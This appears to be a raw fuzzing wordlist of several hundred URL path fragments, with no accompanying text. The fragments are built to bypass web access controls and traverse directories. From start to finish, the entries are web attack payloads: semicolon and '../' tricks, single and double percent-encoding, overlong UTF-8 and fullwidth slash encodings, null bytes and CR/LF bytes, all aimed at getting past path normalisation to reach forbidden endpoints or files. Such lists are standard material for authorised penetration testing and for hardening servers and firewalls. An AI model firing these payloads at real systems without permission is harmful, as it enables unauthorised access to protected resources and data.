;
;?
;/
;/.;.
;/..
;/..;
;/../
;/../;/
;/../;/../
;/../.;/../
;/../../
;/../..//
;/.././../
;/..//
;/..//../
;/..///
;/..//%2e%2e/
;/..//%2f
;/../%2f/
;/..%2f
;/..%2f..%2f
;/..%2f/
;/..%2f//
;/..%2f%2e%2e%2f
;/..%2f%2f../
;/.%2e
;/.%2e/%2e%2e/%2f
;//
;//..
;//../../
;///..
;///../
;///..//
;//%2f../
;/%2e.
;/%2e%2e
;/%2e%2e/
;/%2e%2e%2f/
;/%2e%2e%2f%2e%2e%2f
;/%2e%2e%2f%2f
;/%2f/../
;/%2f/..%2f
;/%2f%2f../
;/$2e%2e%2f..%2f
;%09
;%09;
;%09..
;%09..;
;%2f;/;/..;/
;%2f;//../
;%2f..
;%2F..
;%2f..;/;//
;%2f..;//;/
;%2f..;///
;%2f../;/;/
;%2f../;/;/;
;%2f../;//
;%2f..//;/
;%2f..//;/;
;%2f..//../
;%2f..//..%2f
;%2f..///
;%2f..///;
;%2f../%2f../
;%2f../%2f..%2f
;%2f..%2f..%2f%2f
;%2f..%2f/
;%2f..%2f/../
;%2f..%2f/..%2f
;%2f..%2f%2e%2e%2f%2f
;%2f/;/..;/
;%2f/;/../
;%2f//..;/
;%2f//../
;%2f//..%2f
;%2f/%2f../
;%2f%2e%2e
;%2f%2e%2e%2f%2e%2e%2f%2f
;%2f%2f/../
;x
;x;
;x/
?
?;
??
?#
.
.;
..
..;\
..;\;
..;%00/
..;%0d/
..;%ff/
../
..\
..\;
..%00;/
..%00/
..%00/;
..%01
..%09
..%0a
..%0d
..%0d;/
..%0d/
..%0d/;
..%5c/
..%ff;/
..%ff/
..%ff/;
./
.//
.%00
.%00/
/
/;
/;?
/;/
/;/../
/;/../;/
/;/../;/../
/;/../.;/../
/;/../../
/;/../..//
/;/.././../
/;/..//
/;/..//../
/;/..///
/;/..//%2e%2e/
/;/..//%2f
/;/../%2f/
/;//
/;///
/;x
/;x;
/;x/
/?
/?;
/.
/.;
/.;/
/.;//
/..
/..;/
/..;/;/
/..;/;/..;/
/..;/..;/
/..;/../
/..;//
/..;//..;/
/..;//../
/..;%2f
/..;%2f..;%2f
/..;%2f..;%2f..;%2f
/../
/../;/
/../;/../
/../.;/../
/../..;/
/../../
/../../../
/../../..//
/../..//
/../..//../
/.././../
/..//
/..//..;/
/..//../
/..//../../
/..%2f
/..%2f..%2f
/..%2f..%2f..%2f
/./
/.//
/.%00
/.%00/
//
//;
//;/
//.;/
//..
//..;
//../../
//./
///
///;
///;/
///..
///..;
///..;/
///..;//
///../
///..//
//%2f
//%ef%bc%8f
/#
/%01
/%0a
/%0d
/%20
/%20#
/%20%23
/%23
/%252e/
/%252e%252e%252f/
/%252e%252e%253b/
/%252e%252f/
/%252e%253b/
/%252f
/%2e/
/%2e//
/%2e%2e
/%2e%2e/
/%2e%2e%2f/
/%2e%2e%3b/
/%2e%2f/
/%2e%3b/
/%2e%3b//
/%2f
/%2f/
/%3b/
/%E5%98%8A
/%E5%98%8D
/%ef%bc%8f
/%ef%bc%8f/
/%ef%bc%8f/
/%u002e;
/%u002e/%u002e
/%u002e/%u002e;
/ef%bc%8f%2f
/x;/..
/x;/../
/x;/%2e%2e
/x;/%2e%2e/
/x/;/..;/
/x/;/../
/x/..;/
/x/..;/;/
/x/..;//
/x/../
/x/../;/
/x/..//
/x//..;/
/x//../
#
#?
%01
%01;
%01..
%01/
%09
%09;
%09;/
%09..
%09..;
%09..;/
%09../
%09/
%09%3b
%0a
%0a;
%0a..
%0a/
%0d
%0d;
%0d..
%0d/
%20
%20;
%20/
%23
%23%3f
%252f/
%252f%252f
%2e
%2e;
%2e;/
%2e;//
%2e;%2f
%2e;%2f%2f
%2e/
%2e//
%2e%2e
%2e%2e;
%2e%2e/
%2e%2e%2f
%2e%2f
%2e%2f%2f
%2f
%2f;?
%2f?;
%2f/
%2f//
%2f/%2f
%2f/%ef%bc%8f
%2f%20%23
%2f%23
%2f%2f
%2f%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f/
%2f%ef%bc%8f
%2fef%bc%8f%2f
%3b
%3b/..
%3b//%2f../
%3b/%2e.
%3b/%2e%2e/..%2f%2f
%3b/%2f%2f../
%3b%09
%3b%2f..
%3b%2f%2e.
%3b%2f%2e%2e
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3f%23
%3f%3f
%c0%af
%c0%af;%c0%af
%c0%af;%c0%af%c0%af
%c0%af;x/..
%c0%af.
%c0%af.;
%c0%af.;%c0%af
%c0%af.;%c0%af%c0%af
%c0%af.%c0%af
%c0%af.%c0%af%c0%af
%c0%af%c0%af
%c0%af%c0%af..
%c0%af%c0%af%c0%af
%c0%afx;%c0%af..
%c0%afx;%c0%af..;
%c0%afx%c0%af..
%c0%afx%c0%af..;
%E5%98%8A
%E5%98%8A/
%E5%98%8D
%E5%98%8D/
%ef%bc%8f
%ef%bc%8f;%ef%bc%8f
%ef%bc%8f;x/..
%ef%bc%8f.
%ef%bc%8f.;
%ef%bc%8f.;%ef%bc%8f
%ef%bc%8f.;%ef%bc%8f%ef%bc%8f
%ef%bc%8f.%ef%bc%8f
%ef%bc%8f.%ef%bc%8f%ef%bc%8f
%ef%bc%8f%2f
%ef%bc%8f%ef%bc%8f
%ef%bc%8f%ef%bc%8f..
%ef%bc%8f%ef%bc%8f%ef%bc%8f
%ef%bc%8fx;%ef%bc%8f..
%ef%bc%8fx;%ef%bc%8f..;
%ef%bc%8fx%ef%bc%8f..
%ef%bc%8fx%ef%bc%8f..;
%u002e
%u002e;
%u002e/%u002e
%u560a
%u560d
x;/..
x;/../
x;/%2e%2e
x;/%2e%2e/